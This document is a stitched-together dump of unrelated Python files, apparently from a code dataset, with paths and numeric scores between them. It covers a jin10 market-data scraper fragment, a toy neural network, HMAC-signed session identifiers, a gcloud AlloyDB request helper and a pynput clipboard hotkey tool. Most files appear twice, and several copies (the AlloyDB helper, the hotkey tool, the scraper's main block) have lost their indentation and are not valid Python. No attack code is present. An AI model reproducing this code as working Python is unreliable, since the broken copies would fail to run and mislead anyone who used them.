        "origin": "https://datacenter.jin10.com",
        "pragma": "no-cache",
        "referer": "https://datacenter.jin10.com/reportType/dc_ssi_trends",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-site",
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
        "x-app-id": "rU6QIu7JHe2gOUeR",
        "x-csrf-token": "",
        "x-version": "1.0.0",
    }
    response = requests.get(url, params=params, headers=headers)
    return pd.DataFrame(response.json()["data"]["values"])
if __name__ == "__main__":
get_js_dc_current_df = get_js_dc_current()
print(get_js_dc_current_df)
macro_fx_sentiment_df = macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07")
print(macro_fx_sentiment_df) | 0.308503 | 0.252493 |
from neuron import Neuron
from utils import absolute
import random
class Network:
    """A tiny two-layer neural network: one hidden layer plus a single
    output neuron."""

    def __init__(self, neurons_quantity, lamb, alpha, threshold, weights):
        """Configure the neural network.

        :param neurons_quantity: number of neurons in the first layer
        :param lamb: lambda (activation parameter)
        :param alpha: alpha (learning rate)
        :param threshold: maximum acceptable mean error
        :param weights: weight lists for all neurons; the last entry
            belongs to the output neuron
        """
        self.first_layer = [Neuron(weights[n], lamb, alpha) for n in range(neurons_quantity)]
        self.last_layer = Neuron(weights[-1], lamb, alpha)
        self.threshold = threshold

    def run(self, inputs):
        """Feed INPUTS through the network and return its output."""
        layer_outputs = [n.run(inputs) for n in self.first_layer]
        return self.last_layer.run(layer_outputs)

    def update(self, inputs, expected):
        """Run one training step, adjusting all weights toward EXPECTED.

        :param inputs: network inputs
        :param expected: expected output
        """
        layer_outputs = [n.run(inputs) for n in self.first_layer]
        last_output = self.last_layer.run(layer_outputs)
        # The output neuron's update returns the error attributed to each
        # hidden neuron, which is then propagated back.
        hidden_layer_errors = self.last_layer.update(expected - last_output)
        for pos, n in enumerate(self.first_layer):
            n.update(hidden_layer_errors[pos])
            print(f'Neurônio {pos}: {n.weights}')
        print(f'Neurônio final: {self.last_layer.weights}')

    def train(self, data):
        """Train until the mean absolute error drops below the threshold.

        :param data: training rows of the form [input1, input2, expected]
        """
        print('=== Pesos iniciais ===')
        for pos, n in enumerate(self.first_layer):
            print(f'Neurônio {pos}: {n.weights}')
        print(f'Neurônio final: {self.last_layer.weights}')
        error = 1
        it = 0
        while error > self.threshold:
            it = it + 1
            print(f'=== Iteração {it} ===')
            # Bug fix: pick from the whole data set instead of the
            # hard-coded first four rows (randint(0, 3)).
            rand = random.randint(0, len(data) - 1)
            self.update(data[rand][0:2], data[rand][2])
            total = 0
            for d in data:
                total = total + absolute(d[2] - self.run(d[0:2]))
            error = total / len(data)
            print(f'Erro: {error}')
from utils import absolute
import random
class Network:
    """A minimal feed-forward network: a hidden layer of neurons feeding a
    single output neuron."""

    def __init__(self, neurons_quantity, lamb, alpha, threshold, weights):
        """Configure the neural network.

        :param neurons_quantity: number of neurons in the first layer
        :param lamb: lambda (activation parameter)
        :param alpha: alpha (learning rate)
        :param threshold: maximum acceptable mean error
        :param weights: weight lists for every neuron; the last list is
            the output neuron's
        """
        self.first_layer = [Neuron(weights[n], lamb, alpha) for n in range(neurons_quantity)]
        self.last_layer = Neuron(weights[-1], lamb, alpha)
        self.threshold = threshold

    def run(self, inputs):
        """Run one forward pass and return the network output."""
        layer_outputs = [n.run(inputs) for n in self.first_layer]
        return self.last_layer.run(layer_outputs)

    def update(self, inputs, expected):
        """Perform one backpropagation step toward EXPECTED.

        :param inputs: network inputs
        :param expected: expected output
        """
        layer_outputs = [n.run(inputs) for n in self.first_layer]
        last_output = self.last_layer.run(layer_outputs)
        # The output neuron reports the error share of each hidden neuron.
        hidden_layer_errors = self.last_layer.update(expected - last_output)
        for pos, n in enumerate(self.first_layer):
            n.update(hidden_layer_errors[pos])
            print(f'Neurônio {pos}: {n.weights}')
        print(f'Neurônio final: {self.last_layer.weights}')

    def train(self, data):
        """Keep updating the weights until the mean absolute error is
        within the acceptable threshold.

        :param data: training rows of the form [input1, input2, expected]
        """
        print('=== Pesos iniciais ===')
        for pos, n in enumerate(self.first_layer):
            print(f'Neurônio {pos}: {n.weights}')
        print(f'Neurônio final: {self.last_layer.weights}')
        error = 1
        it = 0
        while error > self.threshold:
            it = it + 1
            print(f'=== Iteração {it} ===')
            # Bug fix: sample over the whole training set; randint(0, 3)
            # silently assumed exactly four rows.
            rand = random.randint(0, len(data) - 1)
            self.update(data[rand][0:2], data[rand][2])
            total = 0
            for d in data:
                total = total + absolute(d[2] - self.run(d[0:2]))
            error = total / len(data)
            print(f'Erro: {error}')
from binascii import unhexlify
from hashlib import md5, sha256
from hmac import compare_digest
from hmac import new as hmac
from os import getpid
from random import randint
from socket import getaddrinfo as _forward, gethostbyaddr as _reverse, gethostname, herror as DNSError
from threading import RLock
from time import time
from typing import Optional, Set
from cachetools.func import ttl_cache
# Module logger; the inline __import__ keeps `logging` out of the namespace.
log = __import__('logging').getLogger(__name__)

# 24-bit machine identifier derived from the hostname.  md5 is used only as
# a cheap stable hash here, not for security.
MACHINE = int(md5(gethostname().encode()).hexdigest()[:6], 16)
class SignatureError(ValueError):
    """Raised when a session identifier's signature is missing, expired,
    or fails validation."""
    pass
class Counter:
    """Thread-safe, randomly seeded counter that wraps within 24 bits."""

    def __init__(self):
        self.value = randint(0, 2**24)
        self.lock = RLock()

    def __iter__(self):
        return self

    def __next__(self):
        # Increment atomically; wrap at 0xFFFFFF.
        with self.lock:
            self.value = (self.value + 1) % 0xFFFFFF
            return self.value

    next = __next__  # Python 2 style alias


# Shared module-level counter instance.
counter = Counter()
class DNS:
    """Cached forward and reverse DNS lookups."""

    # Cache tuning shared by both lookup caches below.
    TTL_ENTRIES: int = 128
    TTL_TIME: int = 60 * 60  # One hour.

    @staticmethod
    @ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
    def resolve(host: str) -> Set[str]:
        """Perform a cached forward DNS lookup.

        Retrieves the full set of identified IP addresses associated with the DNS name. This does not use
        `socket.gethostbyname` because there may be a pool of addresses associated with the rDNS name, not just one.
        Returns an empty set when resolution fails.

        Can generate statistics from live operation by calling the `cache_info` method:

        >>> DNS.resolve.cache_info()
        CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
        """
        try:
            # Port 80 is arbitrary; getaddrinfo just needs some service.
            return {resolution[4][0] for resolution in _forward(host, 80)}
        except DNSError:
            return set()

    @staticmethod
    @ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
    def reverse(addr: str) -> Optional[str]:
        """Perform a cached reverse DNS lookup.

        Returns the primary hostname for ADDR, or None when the lookup fails.

        Can generate statistics from live operation by calling the `cache_info` method:

        >>> DNS.reverse.cache_info()
        CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
        """
        try:
            return _reverse(addr)[0]
        except DNSError:
            return None
class SessionIdentifier:
    """A session identifier rendered as 24 hex digits: 32-bit unix time,
    24-bit machine id, 16-bit pid, 24-bit counter."""

    def __init__(self, value=None):
        # Parse an existing identifier when given, otherwise mint one.
        if value:
            self.parse(value)
        else:
            self.generate()

    def parse(self, value):
        """Split a 24-hex-digit identifier string into its four fields."""
        for name, start, end in (('time', 0, 8), ('machine', 8, 14),
                                 ('process', 14, 18), ('counter', 18, 24)):
            setattr(self, name, int(value[start:end], 16))

    def generate(self):
        """Populate the fields for a brand new identifier."""
        self.time = int(time())
        self.machine = MACHINE
        self.process = getpid() % 0xFFFF
        self.counter = next(counter)

    def __bytes__(self):
        return str(self).encode('ascii')

    def __str__(self):
        return f"{self.time:08x}{self.machine:06x}{self.process:04x}{self.counter:06x}"

    def __repr__(self):
        return f"{self.__class__.__name__}('{self}')"
class SignedSessionIdentifier(SessionIdentifier):
    """A SessionIdentifier followed by a 64-hex-digit HMAC-SHA256 signature
    (88 hex digits total)."""

    __slots__ = ('__secret', '__signature', 'expires')

    def __init__(self, value=None, secret=None, expires=None):
        """Parse VALUE (88 hex digits) or generate a fresh identifier.

        SECRET is the HMAC key (str or bytes).  EXPIRES, when set, is the
        maximum identifier age in seconds.
        """
        # Normalize the shared secret to bytes once, up front.
        self.__secret = secret.encode('ascii') if hasattr(secret, 'encode') else secret
        self.__signature = None
        self.expires = expires
        super().__init__(value)

    def parse(self, value):
        """Parse and validate a signed identifier.

        Raises SignatureError when the length or signature is bad.
        """
        if len(value) != 88:
            raise SignatureError("Invalid signed identifier length.")
        super().parse(value)
        self.__signature = value[24:].encode('ascii')
        if not self.valid:
            raise SignatureError("Invalid signed identifier.")

    @property
    def signed(self):
        """The full identifier plus signature, as bytes."""
        return bytes(self) + self.signature

    @property
    def signature(self):
        """Lazily computed HMAC-SHA256 signature (hex digest, as bytes)."""
        if not self.__signature:
            # hexdigest() is always str on Python 3 (the old
            # hasattr(..., 'encode') dance was a Python 2 leftover);
            # encode immediately.
            self.__signature = hmac(
                    self.__secret,
                    unhexlify(bytes(self)),
                    sha256
                ).hexdigest().encode('ascii')
        return self.__signature

    @property
    def valid(self):
        """True when the signature checks out.

        Raises SignatureError (rather than returning False) when the
        signature is missing, expired, or does not match; the unreachable
        `return False` statements after each raise have been removed.
        """
        if not self.__signature:
            raise SignatureError("No signature present.")
        if self.expires and (time() - self.time) > self.expires:
            raise SignatureError("Expired signature.")
        challenge = hmac(
                self.__secret,
                unhexlify(bytes(self)),
                sha256
            ).hexdigest().encode('ascii')
        # Constant-time comparison to avoid timing side channels.
        if not compare_digest(challenge, self.signature):
            raise SignatureError("Invalid signature:", repr(challenge), repr(self.signature))
        return True
from hashlib import md5, sha256
from hmac import compare_digest
from hmac import new as hmac
from os import getpid
from random import randint
from socket import getaddrinfo as _forward, gethostbyaddr as _reverse, gethostname, herror as DNSError
from threading import RLock
from time import time
from typing import Optional, Set
from cachetools.func import ttl_cache
log = __import__('logging').getLogger(__name__)
MACHINE = int(md5(gethostname().encode()).hexdigest()[:6], 16)
class SignatureError(ValueError):
	"""Raised when a signed session identifier fails parsing or validation."""
class Counter:
	"""Thread-safe, wrapping 24-bit counter for identifier generation.
	
	Values always fit the 6-hex-digit counter field of a SessionIdentifier.
	"""
	
	def __init__(self):
		# Start at a random point so counters from separate processes are
		# unlikely to collide. randint bounds are inclusive, so the maximum
		# is 0xFFFFFF (the old `2**24` bound was one past the 24-bit range).
		self.value = randint(0, 0xFFFFFF)
		self.lock = RLock()
	
	def __iter__(self):
		return self
	
	def __next__(self):
		with self.lock:
			# Wrap modulo 2**24 (0x1000000) so every 24-bit value, including
			# 0xFFFFFF, is reachable; the old `% 0xFFFFFF` skipped it.
			self.value = (self.value + 1) % 0x1000000
			value = self.value
		return value
	
	next = __next__  # Python 2-style alias kept for compatibility.
counter = Counter()
class DNS:
	"""Cached forward and reverse DNS helpers."""
	
	TTL_ENTRIES: int = 128  # maximum number of cached lookups
	TTL_TIME: int = 60 * 60  # One hour.
	
	@staticmethod
	@ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
	def resolve(host:str) -> Set[str]:
		"""Perform a cached forward DNS lookup.
		
		Retrieves the full set of identified IP addresses associated with the DNS name. This does not use
		`socket.gethostbyname` because there may be a pool of addresses associated with the rDNS name, not just one.
		Returns an empty set when resolution fails.
		
		Can generate statistics from live operation by calling the `cache_info` method:
		>>> DNS.resolve.cache_info()
		CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
		"""
		try:
			records = _forward(host, 80)
		except DNSError:
			return set()
		return {record[4][0] for record in records}
	
	@staticmethod
	@ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
	def reverse(addr:str) -> Optional[str]:
		"""Perform a cached reverse DNS lookup.
		
		Returns the primary host name for `addr`, or None when it fails.
		
		Can generate statistics from live operation by calling the `cache_info` method:
		>>> DNS.reverse.cache_info()
		CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
		"""
		try:
			hostname, _aliases, _addresses = _reverse(addr)
		except DNSError:
			return None
		return hostname
class SessionIdentifier:
	"""A 96-bit, MongoDB ObjectId-style identifier.
	
	Layout, rendered as 24 lowercase hex digits: 32-bit creation time,
	24-bit machine hash, 16-bit process id, 24-bit rolling counter.
	"""
	
	def __init__(self, value=None):
		# Hydrate from an existing hex string when given, otherwise mint fresh.
		if not value:
			self.generate()
		else:
			self.parse(value)
	
	def parse(self, value):
		"""Split a 24-hex-digit string into the four component fields."""
		for name, start, end in (('time', 0, 8), ('machine', 8, 14), ('process', 14, 18), ('counter', 18, 24)):
			setattr(self, name, int(value[start:end], 16))
	
	def generate(self):
		"""Populate the fields from the current environment."""
		self.time = int(time())
		self.machine = MACHINE
		self.process = getpid() % 0xFFFF  # fold the PID into 16 bits
		self.counter = next(counter)
	
	def __str__(self):
		parts = (
				format(self.time, '08x'),
				format(self.machine, '06x'),
				format(self.process, '04x'),
				format(self.counter, '06x'),
			)
		return ''.join(parts)
	
	def __bytes__(self):
		return str(self).encode('ascii')
	
	def __repr__(self):
		return f"{self.__class__.__name__}('{self}')"
class SignedSessionIdentifier(SessionIdentifier):
	"""A SessionIdentifier carrying an HMAC-SHA256 signature.
	
	Serialized form is 88 characters: the 24-hex-digit identifier followed
	by a 64-hex-digit HMAC of the identifier's raw (unhexlified) bytes.
	"""
	
	__slots__ = ('__secret', '__signature', 'expires')
	
	def __init__(self, value=None, secret=None, expires=None):
		# secret: shared HMAC key (str or bytes); expires: maximum age in
		# seconds, or None to disable expiry checking.
		self.__secret = secret.encode('ascii') if hasattr(secret, 'encode') else secret
		self.__signature = None
		self.expires = expires
		super().__init__(value)
	
	def parse(self, value):
		"""Parse and validate an 88-character signed identifier.
		
		Raises SignatureError on wrong length, bad signature, or expiry.
		"""
		if len(value) != 88:
			raise SignatureError("Invalid signed identifier length.")
		super().parse(value)
		self.__signature = value[24:].encode('ascii')
		if not self.valid:  # `valid` raises itself on failure; belt-and-braces
			raise SignatureError("Invalid signed identifier.")
	
	@property
	def signed(self):
		"""The identifier plus signature, as ASCII bytes."""
		return bytes(self) + self.signature
	
	@property
	def signature(self):
		"""Lazily computed HMAC-SHA256 of the identifier, as hex bytes."""
		if not self.__signature:
			self.__signature = hmac(
					self.__secret,
					unhexlify(bytes(self)),
					sha256
				).hexdigest()
		if hasattr(self.__signature, 'encode'):
			self.__signature = self.__signature.encode('ascii')
		return self.__signature
	
	@property
	def valid(self):
		"""True when the stored signature verifies and has not expired.
		
		Never returns False: every failure path raises SignatureError.
		(The original carried unreachable `return False` statements after
		each raise; they were dead code and have been removed.)
		"""
		if not self.__signature:
			raise SignatureError("No signature present.")
		if self.expires and (time() - self.time) > self.expires:
			raise SignatureError("Expired signature.")
		challenge = hmac(
				self.__secret,
				unhexlify(bytes(self)),
				sha256
			).hexdigest()
		if hasattr(challenge, 'encode'):
			challenge = challenge.encode('ascii')
		result = compare_digest(challenge, self.signature)
		if not result:
			raise SignatureError("Invalid signature:", repr(challenge), repr(self.signature))
		return True
"""Helper functions for constructing and validating AlloyDB instance requests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import properties
def ConstructCreateRequestFromArgs(client, alloydb_messages, project_ref, args):
  """Builds the request to create an AlloyDB instance from parsed CLI args.

  Args:
    client: Client for api_utils.py class; only its resource parser is used.
    alloydb_messages: Messages module for the API client.
    project_ref: parent resource path of the resource being created
    args: Command line input arguments.

  Returns:
    Fully-constructed request to create an AlloyDB instance.
  """
  instance_resource = alloydb_messages.Instance()
  # set availability-type if provided (helper returns None when flag omitted)
  instance_resource.availabilityType = _ParseAvailabilityType(
      alloydb_messages, args.availability_type)
  instance_resource.machineConfig = alloydb_messages.MachineConfig(
      cpuCount=args.machine_cpu)
  # Build the instance's fully-qualified resource name; the project comes
  # from the active gcloud configuration (GetOrFail raises when unset).
  instance_ref = client.resource_parser.Create(
      'alloydb.projects.locations.clusters.instances',
      projectsId=properties.VALUES.core.project.GetOrFail,
      locationsId=args.region,
      clustersId=args.cluster,
      instancesId=args.instance)
  instance_resource.name = instance_ref.RelativeName()
  # Database flags arrive via --database-flags and are parsed with the
  # generic key/value (labels) machinery.
  instance_resource.databaseFlags = labels_util.ParseCreateArgs(
      args,
      alloydb_messages.Instance.DatabaseFlagsValue,
      labels_dest='database_flags')
  instance_resource.gceZone = args.zone
  instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
                                                      args.instance_type)
  instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
                                                        args.assign_ip)
  # Read-pool sizing only applies when creating a READ_POOL instance.
  if instance_resource.instanceType == alloydb_messages.Instance.InstanceTypeValueValuesEnum.READ_POOL:
    instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
        nodeCount=args.read_pool_node_count)
  # TODO(b/185795425): Need better understanding of use cases before adding
  # instance_resource.networkConfig
  # sslRequired (--require-ssl)
  # instance_resource.labels (--labels)
  return (
      alloydb_messages.AlloydbProjectsLocationsClustersInstancesCreateRequest(
          instance=instance_resource,
          instanceId=args.instance,
          parent=project_ref.RelativeName()))
def ConstructPatchRequestFromArgs(alloydb_messages, instance_ref, args):
  """Builds the request to update an AlloyDB instance from parsed CLI args.

  Args:
    alloydb_messages: Messages module for the API client.
    instance_ref: parent resource path of the resource being updated
    args: Command line input arguments.

  Returns:
    Fully-constructed request to update an AlloyDB instance.
  """
  instance_resource = alloydb_messages.Instance()
  # set availability-type if provided (helper returns None when flag omitted)
  instance_resource.availabilityType = _ParseAvailabilityType(
      alloydb_messages, args.availability_type)
  instance_resource.machineConfig = alloydb_messages.MachineConfig(
      cpuCount=args.machine_cpu)
  instance_resource.name = instance_ref.RelativeName()
  # NOTE(review): this uses ParseCreateArgs (not an update-style parser), so
  # flags supplied here replace the existing set wholesale — confirm intended.
  instance_resource.databaseFlags = labels_util.ParseCreateArgs(
      args,
      alloydb_messages.Instance.DatabaseFlagsValue,
      labels_dest='database_flags')
  instance_resource.gceZone = args.zone
  instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
                                                      args.instance_type)
  instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
                                                        args.assign_ip)
  # Unlike the create path, only send a read-pool config when a node count
  # was actually supplied.
  if args.read_pool_node_count:
    instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
        nodeCount=args.read_pool_node_count)
  # TODO(b/185795425): Need better understanding of use cases before adding
  # instance_resource.networkConfig
  # sslRequired (--require-ssl)
  # instance_resource.labels (--labels)
  # NOTE(review): no updateMask is set on this request — presumably the API
  # infers it server-side; verify against the AlloyDB Patch API contract.
  return (
      alloydb_messages.AlloydbProjectsLocationsClustersInstancesPatchRequest(
          instance=instance_resource,
          name=instance_ref.RelativeName()))
def _ParseAvailabilityType(alloydb_messages, availability_type):
if availability_type:
return alloydb_messages.Instance.AvailabilityTypeValueValuesEnum.lookup_by_name(
availability_type.upper())
return None
def _ParseInstanceType(alloydb_messages, instance_type):
if instance_type:
return alloydb_messages.Instance.InstanceTypeValueValuesEnum.lookup_by_name(
instance_type.upper())
return None
def _ParseNetworkConfig(alloydb_messages, assign_ip):
  # Only emit a NetworkConfig when --assign-ip was passed truthy; otherwise
  # execution falls through to the `return None` below, leaving the field
  # unset (server default) rather than explicitly disabled.
  if assign_ip:
    return alloydb_messages.NetworkConfig(publicIpEnabled=assign_ip)
return None | lib/googlecloudsdk/command_lib/alloydb/instance_helper.py | """Helper functions for constructing and validating AlloyDB instance requests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import properties
def ConstructCreateRequestFromArgs(client, alloydb_messages, project_ref, args):
"""Validates command line input arguments and passes parent's resources.
Args:
client: Client for api_utils.py class.
alloydb_messages: Messages module for the API client.
project_ref: parent resource path of the resource being created
args: Command line input arguments.
Returns:
Fully-constructed request to create an AlloyDB instance.
"""
instance_resource = alloydb_messages.Instance()
# set availability-type if provided
instance_resource.availabilityType = _ParseAvailabilityType(
alloydb_messages, args.availability_type)
instance_resource.machineConfig = alloydb_messages.MachineConfig(
cpuCount=args.machine_cpu)
instance_ref = client.resource_parser.Create(
'alloydb.projects.locations.clusters.instances',
projectsId=properties.VALUES.core.project.GetOrFail,
locationsId=args.region,
clustersId=args.cluster,
instancesId=args.instance)
instance_resource.name = instance_ref.RelativeName()
instance_resource.databaseFlags = labels_util.ParseCreateArgs(
args,
alloydb_messages.Instance.DatabaseFlagsValue,
labels_dest='database_flags')
instance_resource.gceZone = args.zone
instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
args.instance_type)
instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
args.assign_ip)
if instance_resource.instanceType == alloydb_messages.Instance.InstanceTypeValueValuesEnum.READ_POOL:
instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
nodeCount=args.read_pool_node_count)
# TODO(b/185795425): Need better understanding of use cases before adding
# instance_resource.networkConfig
# sslRequired (--require-ssl)
# instance_resource.labels (--labels)
return (
alloydb_messages.AlloydbProjectsLocationsClustersInstancesCreateRequest(
instance=instance_resource,
instanceId=args.instance,
parent=project_ref.RelativeName()))
def ConstructPatchRequestFromArgs(alloydb_messages, instance_ref, args):
"""Validates command line input arguments and passes parent's resources.
Args:
alloydb_messages: Messages module for the API client.
instance_ref: parent resource path of the resource being updated
args: Command line input arguments.
Returns:
Fully-constructed request to update an AlloyDB instance.
"""
instance_resource = alloydb_messages.Instance()
# set availability-type if provided
instance_resource.availabilityType = _ParseAvailabilityType(
alloydb_messages, args.availability_type)
instance_resource.machineConfig = alloydb_messages.MachineConfig(
cpuCount=args.machine_cpu)
instance_resource.name = instance_ref.RelativeName()
instance_resource.databaseFlags = labels_util.ParseCreateArgs(
args,
alloydb_messages.Instance.DatabaseFlagsValue,
labels_dest='database_flags')
instance_resource.gceZone = args.zone
instance_resource.instanceType = _ParseInstanceType(alloydb_messages,
args.instance_type)
instance_resource.networkConfig = _ParseNetworkConfig(alloydb_messages,
args.assign_ip)
if args.read_pool_node_count:
instance_resource.readPoolConfig = alloydb_messages.ReadPoolConfig(
nodeCount=args.read_pool_node_count)
# TODO(b/185795425): Need better understanding of use cases before adding
# instance_resource.networkConfig
# sslRequired (--require-ssl)
# instance_resource.labels (--labels)
return (
alloydb_messages.AlloydbProjectsLocationsClustersInstancesPatchRequest(
instance=instance_resource,
name=instance_ref.RelativeName()))
def _ParseAvailabilityType(alloydb_messages, availability_type):
if availability_type:
return alloydb_messages.Instance.AvailabilityTypeValueValuesEnum.lookup_by_name(
availability_type.upper())
return None
def _ParseInstanceType(alloydb_messages, instance_type):
if instance_type:
return alloydb_messages.Instance.InstanceTypeValueValuesEnum.lookup_by_name(
instance_type.upper())
return None
def _ParseNetworkConfig(alloydb_messages, assign_ip):
if assign_ip:
return alloydb_messages.NetworkConfig(publicIpEnabled=assign_ip)
return None | 0.643665 | 0.15863 |
from pynput.keyboard import Key, KeyCode, Listener
import pyperclip
from utils import expand_ranges
from utils import clean_where_clause
import re
import sys
# Copy a code range and automagically paste a SQL-ready statement!
# SHIFT-L
def parse_ranges(txt=None):
    """Extract code ranges from `txt` (default: clipboard contents), expand
    them, and copy a SQL-ready quoted value list back to the clipboard.

    Returns the generated SQL fragment.
    """
    if not txt:
        txt = pyperclip.paste()
    code_pat = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
    codes = re.findall(pattern=code_pat, string=txt)
    try:
        code_list = expand_ranges(codes)
    except Exception:  # narrowed from bare `except:` so Ctrl-C still propagates
        print("Could not iterate this range!")
        code_list = codes
    # Join with separators *between* items: the previous version emitted a
    # trailing comma before the closing parenthesis, which is invalid SQL.
    msg = "(\n" + ",\n".join("'" + code + "'" for code in code_list) + "\n)"
    pyperclip.copy(msg)
    return msg
# Copy a comma-separated list and automagically paste a SQL-ready statement!
# SHIFT-P
def parse_list(txt=None):
    """Turn a comma-separated list in `txt` (default: clipboard contents)
    into a SQL-ready quoted value list and copy it back to the clipboard.

    Returns the generated SQL fragment.
    """
    if not txt:
        txt = pyperclip.paste()
    # Separators between items only: the previous version left a trailing
    # comma before the ")", which is invalid SQL.
    msg = "(\n" + ",\n".join("'" + code + "'" for code in txt.split(',')) + "\n)"
    pyperclip.copy(msg)
    return msg
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-C
def grab_codes(txt=None):
    """Pull all product-code tokens out of `txt` (default: clipboard
    contents) and copy them back as one comma-separated string.

    Returns the list of matched codes.
    """
    source = txt if txt else pyperclip.paste()
    pattern = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
    matches = pattern.findall(source.strip())
    pyperclip.copy(",".join(matches))
    return matches
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-W
def clean_clause(txt=None):
    """Normalise a WHERE clause from `txt` (default: clipboard contents),
    print it, copy it to the clipboard, and return it.
    """
    source = txt if txt else pyperclip.paste()
    result = clean_where_clause(source)
    print(result)
    pyperclip.copy(result)
    return result
def kill_program(txt=None):
    """Announce shutdown and exit cleanly (bound to ESC).

    The unused ``txt`` parameter keeps the signature uniform with the
    other hotkey handlers, which are all invoked with clipboard contents.
    """
    print("Program stopped...")
    sys.exit(0)
# Create a mapping of keys to function (use frozenset as sets are not hashable - so they can't be used as keys)
# Create a mapping of keys to function (use frozenset as sets are not hashable - so they can't be used as keys)
# Each hotkey appears twice (upper- and lower-case KeyCode) because the
# character pynput reports while shift is held varies by platform/layout.
combination_to_function = {
    frozenset(
        [Key.shift, KeyCode(char="c")]
    ): grab_codes,  # No `()` after function_1 because we want to pass the function, not the value of the function
    frozenset([Key.shift, KeyCode(char="C")]): grab_codes,
    frozenset([Key.shift, KeyCode(char="L")]): parse_ranges,
    frozenset([Key.shift, KeyCode(char="l")]): parse_ranges,
    frozenset([Key.shift, KeyCode(char="w")]): clean_clause,
    frozenset([Key.shift, KeyCode(char="W")]): clean_clause,
    frozenset([Key.shift, KeyCode(char="P")]): parse_list,
    frozenset([Key.shift, KeyCode(char="p")]): parse_list,
    # Plain ESC (no modifier) terminates the program.
    frozenset([Key.esc]): kill_program,
}
# Currently pressed keys
current_keys = set()
def on_press(key):
    """Track pressed keys and fire the handler for a completed combination.

    The matched handler receives the current clipboard contents.
    """
    # When a key is pressed, add it to the set we are keeping track of and check if this set is in the dictionary
    current_keys.add(key)
    combo = frozenset(current_keys)
    if combo in combination_to_function:
        # If the current set of keys are in the mapping, execute the function.
        # (The stray, unused `import inspect` the original carried here has
        # been removed.)
        combination_to_function[combo](pyperclip.paste())
def on_release(key):
    """Stop tracking a released key.

    Uses discard() rather than remove(): pynput can report a release for a
    key whose press was never seen (e.g. a key already held when the
    listener started), and remove() would raise KeyError in the listener
    thread.
    """
    current_keys.discard(key)
def main():
    # Block on the keyboard listener until it stops; the hotkey handlers
    # above run on the listener's own thread.
    print("Running...")
    with Listener(on_press=on_press, on_release=on_release) as listener:
        try:
            listener.join()
        except KeyboardInterrupt:
            print("Program stopped.")
if __name__ == "__main__":
main() | clip_parser/clip_parser.py | from pynput.keyboard import Key, KeyCode, Listener
import pyperclip
from utils import expand_ranges
from utils import clean_where_clause
import re
import sys
# Copy a code range a automagically paste a SQL ready statement!
# SHFT-L
def parse_ranges(txt=None):
if not txt:
txt = pyperclip.paste()
code_pat = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
codes = re.findall(pattern=code_pat, string=txt)
try:
code_list = expand_ranges(codes)
except:
print("Could not iterate this range!")
code_list = codes
finally:
msg = "(\n" + "".join(["'" + code + "',\n" for code in code_list]) + ")"
pyperclip.copy(msg)
return msg
# Copy a list and automagically paste a SQL ready statement!
# SHFT-L
def parse_list(txt= None):
if not txt:
txt = pyperclip.paste()
msg = "(\n" + "".join(["'" + code + "',\n" for code in txt.split(',')]) + ")"
pyperclip.copy(msg)
return msg
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-C
def grab_codes(txt=None):
if not txt:
txt = pyperclip.paste()
code_pat = re.compile(r"[a-zA-Z]\d{4}|\d{5}|\d{4}[a-zA-Z]")
txt = txt.strip()
codes = re.findall(pattern=code_pat, string=txt)
pyperclip.copy(",".join(codes))
return codes
# Copy the text from which you wish to extract the text into your clipboard and then execute this script.
# SHIFT-W
def clean_clause(txt=None):
if not txt:
txt = pyperclip.paste()
table = clean_where_clause(txt)
print(table)
pyperclip.copy(table)
return table
def kill_program(txt=None):
print("Program stopped...")
sys.exit(0)
# Create a mapping of keys to function (use frozenset as sets are not hashable - so they can't be used as keys)
combination_to_function = {
frozenset(
[Key.shift, KeyCode(char="c")]
): grab_codes, # No `()` after function_1 because we want to pass the function, not the value of the function
frozenset([Key.shift, KeyCode(char="C")]): grab_codes,
frozenset([Key.shift, KeyCode(char="L")]): parse_ranges,
frozenset([Key.shift, KeyCode(char="l")]): parse_ranges,
frozenset([Key.shift, KeyCode(char="w")]): clean_clause,
frozenset([Key.shift, KeyCode(char="W")]): clean_clause,
frozenset([Key.shift, KeyCode(char="P")]): parse_list,
frozenset([Key.shift, KeyCode(char="p")]): parse_list,
frozenset([Key.esc]): kill_program,
}
# Currently pressed keys
current_keys = set()
def on_press(key):
# When a key is pressed, add it to the set we are keeping track of and check if this set is in the dictionary
current_keys.add(key)
if frozenset(current_keys) in combination_to_function:
# If the current set of keys are in the mapping, execute the function
import inspect
combination_to_function[frozenset(current_keys)](pyperclip.paste())
def on_release(key):
# When a key is released, remove it from the set of keys we are keeping track of
current_keys.remove(key)
def main():
print("Running...")
with Listener(on_press=on_press, on_release=on_release) as listener:
try:
listener.join()
except KeyboardInterrupt:
print("Program stopped.")
